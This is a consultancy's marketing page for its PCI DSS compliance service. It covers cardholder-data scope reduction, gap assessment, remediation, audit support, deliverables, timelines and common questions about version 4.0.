PCI DSS
Security standard for organizations handling cardholder data.
Overview
What it is, in plain English.
PCI DSS v4.0.1 is the global standard every merchant, processor, and service provider must follow when handling cardholder data. The cost of compliance is dominated by scope — and the cost of breach is dominated by what's in scope when it happens. Lyra's PCI work is obsessively focused on minimizing your Cardholder Data Environment (CDE) through segmentation, tokenization, and architectural redesign — then implementing the 12 requirements against what's left.
PCI DSS scoping, segmentation, control implementation, and ongoing monitoring across all merchant and service-provider levels.
Who needs it
Built for organizations that have to get this right.
Merchants of any level (1–4) accepting card payments
Service providers storing, processing, or transmitting cardholder data
SaaS platforms whose customers transact on their infrastructure
Call centers, healthcare billing operations, and any business taking card-not-present payments
Our approach
How we get you audit-ready and keep you there.
We don't drop policy templates and disappear. We design controls, implement them in your environment, prepare every artifact, and walk with you through the audit — then operate the program after certification so you stay compliant year over year.
- 01
Scope Reduction
Before we implement a single control, we shrink the CDE — through tokenization, P2PE, network segmentation, and SAQ pathway selection.
- 02
Gap Assessment
We assess the in-scope environment against all 12 PCI DSS requirements and 300+ sub-requirements, with a defensible scoping diagram.
- 03
Remediation & Hardening
We implement the technical and procedural controls — segmentation firewalls, FIM, logging, access reviews, and secure development practices.
- 04
QSA Support or SAQ Completion
For Level 1 entities, we partner with a QSA and run the audit prep. For SAQ-eligible entities, we complete the SAQ and Attestation of Compliance.
Key controls
What's actually in scope.
Network segmentation and firewall rule governance
Strong cryptography for cardholder data at rest and in transit
Tokenization and P2PE deployments
File integrity monitoring and centralized log management
Quarterly ASV scans and annual penetration testing
Secure software development and change management
Deliverables
What you walk away with.
Scoping diagram and Cardholder Data Environment definition
Gap assessment and remediation plan
Self-Assessment Questionnaire (A, A-EP, B, B-IP, C, C-VT, D, P2PE) or QSA-delivered Report on Compliance
Attestation of Compliance for acquirers and brands
Continuous monitoring program with quarterly evidence cycles
Timeline
SAQ pathway: 8–16 weeks. Level 1 RoC: 4–9 months including QSA fieldwork.
Questions we hear
Straight answers to the real questions.
- What changed in PCI DSS v4.0?
- v4.0 (mandatory March 31, 2025) introduced customized approach options, expanded MFA requirements, targeted risk analyses, and tighter requirements around scripts on payment pages (Req 6.4.3 and 11.6.1).
- Can we just outsource to a PCI-compliant processor?
- Outsourcing reduces scope dramatically, but it does not eliminate it. Even SAQ-A merchants must protect the redirect/iframe page itself — and v4.0 has new scripting controls that catch many merchants by surprise.
- Do you provide ASV scans?
- We don't directly hold ASV status, but we partner with several ASVs and manage the scanning, finding remediation, and quarterly evidence on your behalf.
Other frameworks we support
SOC 2 (Type 1 and Type 2)
AICPA SOC 2
Learn moreISO 27001
ISO/IEC 27001 ISMS
Learn moreCMMC
Cybersecurity Maturity Model Certification
Learn moreNIST 800-171
Protecting CUI in non-federal systems
Learn moreNIST CSF (including 2.0)
NIST Cybersecurity Framework
Learn moreHIPAA / HITRUST
Healthcare privacy and security
Learn more
24 / 7 Recovery
When the worst day hits, every minute matters.
Our breach team is standing by — call, email, or submit a request and we respond within minutes.